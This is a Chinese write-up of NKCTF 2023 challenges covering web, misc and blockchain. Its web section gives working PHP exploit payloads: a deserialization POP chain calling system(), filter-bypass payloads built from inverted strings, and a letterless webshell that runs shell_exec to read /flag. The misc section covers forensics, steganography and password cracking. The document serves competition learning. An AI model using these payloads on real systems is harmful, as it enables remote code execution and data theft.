总体体验还是不错的,感谢我的二进制队友带我。
WEB
babyphp
Pop链,链子__destruct()->__toString()->__invoke(),最后要绕一个正则匹配,通过dir命令发现flag在/f1ag中,利用剩下没被过滤的通配符进行匹配,exp:
<?php
class Welcome {
public $name;
public $arg;
}
class Happy {
public $shell;
public $cmd;
}
class Hell0 {
public $func;
}
$a = new Welcome;
$a -> name = "welcome_to_NKCTF";
$a -> arg = new Hell0;
$a -> arg -> func = new Happy;
$a -> arg -> func -> shell = 'system';
$a -> arg -> func -> cmd = 'more /[^b]1[^b][^b]';
echo serialize($a);
?>
easyphp
第一层md5弱比较,数组绕过;
第二层sha1强比较且做了强制类型转化,用PDF那个payload绕过;
第三层用浮点数性质绕过,114514.1;
第四层用[被解析后不会解析剩下的符号这一特性绕过,NS[CTF.go;
第五层取反绕过,(~%8C%86%8C%8B%9A%92)(~%9C%9E%8B%DF%D0%99%93%9E%98);。
easy_pms
参考http://www.360doc.com/content/12/0121/07/77981587_1066789891.shtml这篇文章,先激活cookie,再rce:
hard_php
经典无字母及部分字符webshell,限制长度105,这里用了之前ctfshow极限rce的一个payload。同时phpinfo发现存在disable_function,但是shell_exec没有被过滤。题目环境不出网,就用了重定向把flag送到1.txt里面再访问即可。Payload:
NKCTF=$_=(_/_._)[_];++$_;$__=$_.$_++;++$_;++$_;++$_;$__.=$_++.$_;$_=_.$__;\$\$_[_](\$\$_[__]);&_=shell_exec&__=cat /flag > 1.txt
webpagetest
AVD-2022-1474319漏洞,参考文章https://xz.aliyun.com/t/11798#toc-1
借助phpggc程序生成执行id命令的phar文件并发送,一条龙服务就行了
MISC
hard-misc
签到题,base32+发公众号
NKCTF2023问卷调查
blue
经典取证,flag在回收站:
THMaster
找东方wiki的修改器,链接寄了,去贴吧找
thprac.v2.2.1.2.exe
进入练习模式前改分,进入
提示解密了,在replay看到了叫flag的记录
看完了没找到,问了一下出题人,在文件里,用010打开,在文件末
三体
看文件尾发现一半flag,知道flag是按RGB来的,然后就按RGB去搜},就找到另一半flag了。
两部分拼接起来就是flag了。
easy_bmp
宽高题,高就直接改就行了,不要改太高:
宽要根据bmp性质算一下,因为是32位深,所以1589466/4/283=1404,图片可以扔ps里看:
拼起来就是压缩包密码,解压还是一张bmp,这次宽高都要自己算,因为深度是8,所以大小就是分辨率,猜测直接开方,大概是360左右,拿到flag:
easy_rgb
Montage+gaps拼图得到key解压rgb.rar:
解压出来3个txt文件,按照rgb顺序一位一位取发现是一个压缩包,写脚本提取:
#读取字节
file1 = open("r.txt","rb")
file2 = open("g.txt","rb")
file3 = open("b.txt","rb")
#写入字节
p = open("decode.txt","wb")
data = []
#循环1669次,每次依文件顺序读取
for a in range(149):
#设定每次往后读取一个字节
i = file1.read(1)
data.append(i)
i = file2.read(1)
data.append(i)
i = file3.read(1)
data.append(i)
for i in data:
p.write(i)
把decode.txt的内容里面的16进制转一下就是压缩包了,aes-128,弱密钥:
easy_word
爆破下密码:
import string
import hashlib
s = 'b75d1224'
chars = string.ascii_letters + string.digits # 构造字符集
print (chars)
for i in chars:
for j in chars:
for k in chars:
for n in chars:
psw = 'h' + i + j + 'vO' + k + n + '0'
sha256 = hashlib.sha256(psw.encode(encoding='utf-8')).hexdigest()
if s ==sha256[0:8]:
print(psw)
把到文档里面密码删掉,解压docx文件,发现藏了个图片
经过尝试是cloacked-pixel,key就是图片上的:
first spam of rabbit year
https://www.spammimic.com/decode.shtml解密:
社会主义核心价值观编码:
与佛论禅https://fy.by950.top/,密码rabbit:
检查这些字符发现零宽:
结合结尾的tip:47&13,密文是rot47处理,密钥是rot13处理,解rabbit即可
baby_music
看十六进制,发现data很有规律,不是1027就是1127,猜测表示二进制,写脚本提取:
def bytes2hex(bytes):
num = len(bytes)
hexstr = u""
for i in range(num):
t = u"%x" % bytes[i]
if len(t) % 2:
hexstr += u""
hexstr += t
return hexstr.upper()
#读取字节
file1 = open("flag.wav","rb")
#写入字节
p = open("flag1.txt","wb")
data = []
for a in range(20000000):
#设定每次往后读取一个字节
i = file1.read(2)
i = bytes2hex(i)
if i == '1027':
data.append(b'0')
elif i == '1127':
data.append(b'1')
elif i == '':
break
for i in data:
p.write(i)
提取出来后from bin就是压缩包了。注释是一段摩斯电码,告诉我们密码是16位随机字符,因此肯定没法爆破,但是zip里面是png,且算法符合明文攻击的前提,因此用bkcrack爆破密钥,得到flag.png:
misc?iot!
由固件名得知开发板型号是STM32F103C8,经典的ARM架构开发板,用IDA选择ARM小端序架构就能反编译出来。
从start一路跟进找到了关键的加密函数,观察特征猜测是RC4加密。
很容易找到加密数据段和密钥。
Blockchain
SignIn
划到最下面创建合约那一条,拿到合约内容,hex转字符即可。
HelloWorld
web3py:
from web3 import Web3, HTTPProvider
w3 = Web3(HTTPProvider('http://blockchain.247533.top:10020'))
assert w3.isConnected()
# create a account
pk = '私钥'
account = w3.eth.account.privateKeyToAccount(pk)
# print(account.address)
abi = '[{"inputs":[{"internalType":"string","name":"_greeting","type":"string"}],"stateMutability":"nonpayable","type":"constructor"},{"inputs":[],"name":"greet","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"isSolved","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"string","name":"_greeting","type":"string"}],"name":"setGreeting","outputs":[],"stateMutability":"nonpayable","type":"function"}]'
contract = w3.eth.contract(address='0x781CA0733773aBE77138b00B77B7D8D79aAEd52A', abi=abi)
# build a transaction
tx = contract.functions.setGreeting('Hello,NKCTF2023').buildTransaction({'from': account.address,'nonce': w3.eth.getTransactionCount(account.address),'gas': 1000000,'gasPrice': w3.toWei('1', 'gwei'),})
# sign a transaction
signed_tx = account.signTransaction(tx)
# send a transaction
tx_hash = w3.eth.sendRawTransaction(signed_tx.rawTransaction)
# get transaction receipt to get contract address
tx_receipt = w3.eth.waitForTransactionReceipt(tx_hash)
print(tx_receipt)
decompile_revenge
拿到合约内容,反编译:
这4串sha256用题目给的somd5直接拿下。